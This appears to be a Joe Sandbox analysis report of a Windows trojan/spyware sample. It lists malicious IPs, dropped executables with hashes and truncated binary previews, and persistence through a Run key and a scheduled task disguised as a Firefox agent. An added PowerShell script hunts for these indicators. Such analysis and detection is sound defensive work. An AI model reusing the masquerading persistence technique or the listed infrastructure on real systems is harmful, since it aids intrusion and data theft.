Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp
Malicious: false
Reputation: high
https://support.google.com/chrome/?p=plugin_divx
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Contacted IPs

Public

IP              | Domain            | Country            | ASN   | ASN Name     | Malicious
194.180.174.100 | unknown           | unknown            | 39798 | MIVOCLOUDMD  | true
193.56.146.41   | unknown           | unknown            | 10753 | LVLT-10753US | false
194.147.85.186  | geenaldencia9.top | Russian Federation | 61400 | NETRACK-ASRU | false
216.128.137.31  | unknown           | United States      | 20473 | AS-CHOOPAUS  | true
149.154.167.99  | t.me              | United Kingdom     | 62041 | TELEGRAMRU   | false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 491658
Start date: 27.09.2021
Start time: 19:32:22
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 9s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: pAWNholT8X.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@39/9@57/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 72.9% (good quality ratio 66.1%)
• Quality average: 63.7%
• Quality standard deviation: 33.5%
HCA Information:
• Successful, ratio: 61%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• HTTP Packets have been reduced
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.210.154, 93.184.221.240, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 95.100.54.203, 104.26.13.31, 104.26.12.31, 172.67.75.172
• Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing behavior and disassembly information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time     | Type            | Description
19:34:13 | API Interceptor | 12x Sleep call for process: svchost.exe modified
19:34:14 | Task Scheduler  | Run new task: Firefox Default Browser Agent 9C5C6BA18E04940F path: C:\Users\user\AppData\Roaming\ecrjwib
19:34:55 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run intel.exe C:\Users\user\AppData\Local\Temp\E52D.exe
19:35:03 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run intel.exe C:\Users\user\AppData\Local\Temp\E52D.exe
19:35:19 | API Interceptor | 3x Sleep call for process: FE25.exe modified
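The two persistence entries in the table (a scheduled task whose action lives under AppData\Roaming, and an "intel.exe" Run value pointing at E52D.exe in the user's Temp directory) are what a responder would sweep other hosts for. The PowerShell below is an added hunting script, not part of the Joe Sandbox report or its tooling; the function names are my own, the indicator values are copied from the table, and it assumes a Windows host where the Get-ScheduledTask cmdlet exists (Windows 8 / Server 2012 or later). A legitimate task named "Firefox Default Browser Agent <id>" exists on hosts with Firefox installed and runs default-browser-agent.exe from the Firefox installation directory, so the name alone proves nothing; the tell here is the action path under AppData\Roaming, which the script flags independently of the name.

```powershell
# Added example (not from the Joe Sandbox report): sweep a live host for the Run-key and
# scheduled-task persistence recorded above. Run elevated to cover HKLM and all users' tasks.

# Indicators taken from the report's Simulations table.
$Iocs = @{
    RunValueName = 'intel.exe'
    RunTarget    = 'E52D.exe'
    TaskName     = 'Firefox Default Browser Agent 9C5C6BA18E04940F'
    TaskTarget   = 'ecrjwib'
}

# Directories an installed product seldom launches from; catches renamed variants too.
$SuspiciousDirs = @('\\AppData\\Local\\Temp\\', '\\AppData\\Roaming\\', '\\Users\\Public\\')

$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# Properties the registry provider adds to every item; they are not Run values.
$ProviderProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Test-SuspiciousTarget {
    param([string]$Path)
    foreach ($d in $SuspiciousDirs) { if ($Path -match $d) { return $true } }
    return $false
}

function Get-SuspiciousRunValues {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($p in $item.PSObject.Properties) {
            if ($p.Name -in $ProviderProps) { continue }
            $data = [string]$p.Value
            if ($p.Name -eq $Iocs.RunValueName -or
                $data -match [regex]::Escape($Iocs.RunTarget) -or
                (Test-SuspiciousTarget $data)) {
                [pscustomobject]@{ Source = 'RunKey'; Location = $key; Name = $p.Name; Target = $data }
            }
        }
    }
}

function Get-SuspiciousTasks {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $exe = [string]$action.Execute
            if (-not $exe) { continue }   # COM-handler actions carry no executable path
            if ($task.TaskName -eq $Iocs.TaskName -or
                $exe -match [regex]::Escape($Iocs.TaskTarget) -or
                (Test-SuspiciousTarget $exe)) {
                [pscustomobject]@{
                    Source   = 'ScheduledTask'
                    Location = $task.TaskPath
                    Name     = $task.TaskName
                    Target   = ($exe + ' ' + [string]$action.Arguments).Trim()
                }
            }
        }
    }
}

$findings = @(Get-SuspiciousRunValues) + @(Get-SuspiciousTasks)
if ($findings.Count -eq 0) { 'No Run-key or scheduled-task entries matched.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

The exact task name and value name are the weakest signals (the task-name suffix is per-install and the value name is trivially changed), so the path-based check is the one to keep when adapting this to other samples. Any hit should be followed by collecting the referenced file and comparing its hashes with the dropped-file entries later in this report before it is removed.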

Joe Sandbox View / Context

IPs: no context
Domains: no context
ASN: no context
JA3 Fingerprints: no context
Dropped Files: no context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\757C.exe.log
Process: C:\Users\user\AppData\Local\Temp\757C.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 700
Entropy (8bit): 5.346524082657112
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
MD5: 65CF801545098D915A06D8318D296A01
SHA1: 456149D5142C75C4CF74D4A11FF400F68315EBD0
SHA-256: 32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
SHA-512: 4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
Malicious: false
Reputation: unknown
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
C:\Users\user\AppData\Local\Temp\6CB1.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 131072
Entropy (8bit): 6.744723403447709
Encrypted: false
SSDEEP: 3072:5nwcUww9skaoTdIK01tsuZ1qfPPxCfVz:5929ksF01qfi
MD5: 2616D3A90B92A23F31A0BA2508076DFC
SHA1: C6EC7B9A61A59EC370DAA8A7C4C3C4B546ADDB24
SHA-256: 74F077E0666F913CF2A797270B7F9F9747F822C61C896B3314E0A247960D4E01
SHA-512: 89DE787756A9EBECEB11DBCD3FB53A142CA9FBE8298F1D6994B52C87E9530B4FABE43A63C315A6015F60F03F82FAF90630FFA0C5E27E2DCAA12CB090E1B18C13
Malicious: true
Reputation: unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L......_.....................H......,........ ....@..........................p.......................................Q..O...,I..<...................................!...............................4..@............ ..|............................text............................... ..`.rdata...1... ...2..................@..@.data...|U...`.......8..............@....rsrc...............V..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):441344
                                                                                                                                                                                                  Entropy (8bit):3.7251930439548104
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:jklT97wnjwqyjha/e1OPRsLIl8w4Lzmf84Nt3hity4ouowJ+:uBjh1JO
                                                                                                                                                                                                  MD5:287976D8C62519CBB494CF31916CE26E
                                                                                                                                                                                                  SHA1:E9749FE784AEBA486115EE4CEF0FE8400439D613
                                                                                                                                                                                                  SHA-256:91802CC2E767E5FC498A4F8068B97DE249A16B5AA05E085354862E5CC3F17D3B
                                                                                                                                                                                                  SHA-512:9E63B59777B413D9D62C68EE3F7A52E487EA6A563603174FBCCC5EB8893009B04A11D37E7D29D286E26BB7039C84027493A605947B0472AFFA73FAFBC5F0D29F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Eo................0.................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............/...........................................................0..........~....u....s....z&.....*.................2(.... ....j*....r...p(....*.s....%.}..........s....o....9....s....z*....(.........*2.s....(....*...v.(......rh..p~....o....(....*....{....*.0..s........:....~........(......~....:$.........(.........(....(....(.........~....{....~.....o....~....o....(....o....}....*..0...........(.....(.....o....*.6..(....(....*...0..8.......s.......8............i].a(..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8433.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2766048
                                                                                                                                                                                                  Entropy (8bit):7.719426833917887
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:BpaPwRrdA+QcpPQYNWcEp4PdznZmkLV/RycGQzNDNui0G:naPp+3pPQQ8+rzFtNuY
                                                                                                                                                                                                  MD5:F853FE6B26DCF67545675AEC618F3A99
                                                                                                                                                                                                  SHA1:A70F5FFD6DAC789909CCB19DFB31272A520C7BC0
                                                                                                                                                                                                  SHA-256:091BA447AF0F0CABD66484B3F81E909CA01BE4E27DB9CCF42779174E04DAD57A
                                                                                                                                                                                                  SHA-512:4764E88D5BDCF88447E0782C88FEC18F5A1083B460829E16635A8602173F1A6813D3FF93866BEF587F9F9B682451D4386BD765B2DA580C69F7483B48F074BBD3
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e...............0..<...V......X+9.. ...`....@.. ........................a.......*...@.................................:...P.....U.C.............*............................................................................................. .@... ...................... ..` g...`...<..................@..@ ............................@..@.idata... ..........................@....themida..2.. ......................`....boot....<... 9..<..................`..`MSI GF65P....`U..................... ..`MSI GF65P.....U......".............. ..`.rsrc...C.....U......0..............@..@........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\CEB6.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3455664
                                                                                                                                                                                                  Entropy (8bit):6.441059558704059
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:2k50a1yGMilKK4s2U4GaS0d2J42c3F2QYZbRQ:30cwilB4s2fGaSs2J4l3Qt7Q
                                                                                                                                                                                                  MD5:8E50D7FBCC07F331637ABBAA2C6ED428
                                                                                                                                                                                                  SHA1:7A9E775ADDA81B2A47E8A7B453F6C480476FB17A
                                                                                                                                                                                                  SHA-256:AA431518B3EB9FDA6C05801B17B6A11880A4143C3B1B405154140C190772BF0A
                                                                                                                                                                                                  SHA-512:33E6E79D4772C39D79AEF8458FEFC06B717326D328275D3B2D0D2F0A348AAED12E711B2EB46AC7FF84D74C634963E35D016363734442A9118251029EDCFEE24C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L.................0.............n.... ...@....@.. ........................;.....".4...@.................................:@..P.....;.S1............4..8.......................................................................................... . ... ...~.................. ..` .....@......................@..@ ..... .......4..............@..@.idata... ...@.......6..............@...Intel Co. ...`.......8..............@..@.themida..2.......2..B..............`...Intel CoP.....;......B4............. ..`.rsrc...S1....;..2...P4.............@..@................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\E52D.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):137216
                                                                                                                                                                                                  Entropy (8bit):6.81103188382168
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:YGAF8W9CjQE5RA4Mk5PGVze5NVh7O0Oyz:YGvWSQtkBGV2VjOc
                                                                                                                                                                                                  MD5:D0F8625E7557AE3CCC13440F3843515F
                                                                                                                                                                                                  SHA1:81A56C0468A80228190B001A49C6DA67D90ECC63
                                                                                                                                                                                                  SHA-256:ECB40D6A2531A019EE02585E66982606C2DF2083462774198715388BCBB48D12
                                                                                                                                                                                                  SHA-512:1A0370A18F5600B65251CF3EB6FA7921F6DB3EE12EA83794D6C6E3AF19ED517593E3A529299741BB53999C51B09BB50070A0642B3E747340AB7A882A39C9307D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......_.....................f......B.............@.................................`a..............................`B..T....9..<...................................................................0%..@...............|............................text...P........................... ..`.rdata...2.......4..................@..@.data...|U...P.......4..............@....rsrc................R..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\FE25.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):4745728
                                                                                                                                                                                                  Entropy (8bit):7.889408291592824
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:2b0YmXyYfLYaoZedg+4lOhyS0fOuFqC6Ws2HRvu:+miYTerFO/PuFjJsSG
                                                                                                                                                                                                  MD5:CDDB8954B4839E0106963B050ED664EB
                                                                                                                                                                                                  SHA1:21ACB70C67A94DD6D8CFE8EF43F7FFD48D47FD17
                                                                                                                                                                                                  SHA-256:BE6C2FF9EE6768B86F8C6E5E3138D61D0B0F47C5D1D28B3EBC423EA37420DDB3
                                                                                                                                                                                                  SHA-512:8AD60BDD5C8E4B91D663FE8E936C2B9BF57BB5614B4AE9556BF1BBF238CA5909D7500ADCD5E6E773D534EB87F88E58C124E627F743CFC1AE12175EDBCBF862A8
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....7a.....................|........]...........@..........................0y......UI...@.................................xB9.|.....u.....................pu......................................]u.@.............h..............................text...C........................... ..`.rdata..B...........................@..@.data....T...p......................@...RAM 8GB ............................`..`RAM 8GB S.'.........................`..`RAM 8GB 0.D...0...D.................`..`.reloc.......pu.......D.............@..@.rsrc........u.......D.............@..@................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\ecrjwib
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                  Entropy (8bit):6.736702902065376
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:jLOCZw1YLUlP7fXadkUQ0+78Au2SRjj/WgmO/Z/eh3uJp+Q7Jgz70eIacRbUozsz:jnwcUNPfjQv5/Z0qfPeZcRwKsz
                                                                                                                                                                                                  MD5:FB45ECBFB0E13B103B6B1C583479A21D
                                                                                                                                                                                                  SHA1:9CB9EEAD55F3B3F4847FD8F1BDD8D20CA46D9DC2
                                                                                                                                                                                                  SHA-256:D0426ED95048EC08395EDDDAAA1D3CCC7A3F769D4324195E1F075B16F462A4C6
                                                                                                                                                                                                  SHA-512:1969648CB590E6C71FCF0391003CE56D22472F01105D9E3FAB9E3ACBACB687DDE8CF0CA01C26B862EE7CF582D8B5605B91B82011F9CC061E3500EF8390570889
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L.....O_.....................H......,........ ....@..........................p.......(...............................Q..T...,I..<...................................!...............................4..@............ ..|............................text............................... ..`.rdata...1... ...2..................@..@.data...|U...`.......8..............@....rsrc...............V..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\ecrjwib:Zone.Identifier
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: unknown
Preview: [ZoneTransfer]....ZoneId=0

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.736702902065376
TrID:
• Win32 Executable (generic) a (10002005/4) 99.94%
• Clipper DOS Executable (2020/12) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name: pAWNholT8X.exe
File size: 131072
MD5: fb45ecbfb0e13b103b6b1c583479a21d
SHA1: 9cb9eead55f3b3f4847fd8f1bdd8d20ca46d9dc2
SHA256: d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6
SHA512: 1969648cb590e6c71fcf0391003ce56d22472f01105d9e3fab9e3acbacb687dde8cf0ca01c26b862ee7cf582d8b5605b91b82011f9cc061e3500ef8390570889
SSDEEP: 1536:jLOCZw1YLUlP7fXadkUQ0+78Au2SRjj/WgmO/Z/eh3uJp+Q7Jgz70eIacRbUozsz:jnwcUNPfjQv5/Z0qfPeZcRwKsz
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..

File Icon

Icon Hash: e0e4e8beb0e4c8ea

Static PE Info

General

Entrypoint: 0x401b2c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x5F4F9DAD [Wed Sep 2 13:27:09 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: f98cc9327e2d65cc6189a693f26e1c1d

Entrypoint Preview

Instruction
call 00007F3290BE146Ch
jmp 00007F3290BDE87Dh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00416008h+ecx*8]
je 00007F3290BDEA15h
inc ecx
cmp ecx, 2Dh
jc 00007F3290BDE9F3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F3290BDEA10h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0041600Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F3290BE10D1h
test eax, eax
jne 00007F3290BDEA08h
mov eax, 00416170h
ret
add eax, 08h
ret
call 00007F3290BE10BEh
test eax, eax
jne 00007F3290BDEA08h
mov eax, 00416174h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F3290BDE9E7h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F3290BDE987h
pop ecx
mov esi, eax
call 00007F3290BDE9C1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
push 0000000Ch
push 004145D8h
call 00007F3290BDF78Ch
mov ecx, dword ptr [ebp+08h]
xor edi, edi
cmp ecx, edi
jbe 00007F3290BDEA30h
push FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, dword ptr [ebp+0Ch]
sbb eax, eax
inc eax
jne 00007F3290BDEA21h
call 00007F3290BDE993h
mov dword ptr [eax], 0000000Ch
push edi
push edi
push edi

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x151a0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1492c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9c000 | 0xa8f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x121c0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x13480 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x12000 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x10080 | 0x10200 | False | 0.800932655039 | data | 7.5513445643 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x12000 | 0x31f4 | 0x3200 | False | 0.25703125 | data | 4.15966796055 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x16000 | 0x8557c | 0x1e00 | False | 0.118489583333 | data | 1.32605149668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x9c000 | 0xa8f0 | 0xaa00 | False | 0.668795955882 | data | 6.07261172713 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x9c3f0 | 0xea8 | data | English | United States
RT_ICON | 0x9d298 | 0x8a8 | data | English | United States
RT_ICON | 0x9db40 | 0x6c8 | data | English | United States
RT_ICON | 0x9e208 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x9e770 | 0x25a8 | data | English | United States
RT_ICON | 0xa0d18 | 0x10a8 | data | English | United States
RT_ICON | 0xa1dc0 | 0x988 | data | English | United States
RT_ICON | 0xa2748 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xa2c28 | 0x6c8 | data | English | United States
RT_ICON | 0xa32f0 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xa3858 | 0x25a8 | data | English | United States
RT_ICON | 0xa5e00 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_STRING | 0xa64c8 | 0x424 | data | |
RT_ACCELERATOR | 0xa62a8 | 0x50 | data | |
RT_ACCELERATOR | 0xa62f8 | 0x20 | data | |
RT_GROUP_ICON | 0xa6268 | 0x3e | data | English | United States
RT_GROUP_ICON | 0xa2bb0 | 0x76 | data | English | United States
RT_VERSION | 0xa6318 | 0x1b0 | data | |

Imports

DLL | Import
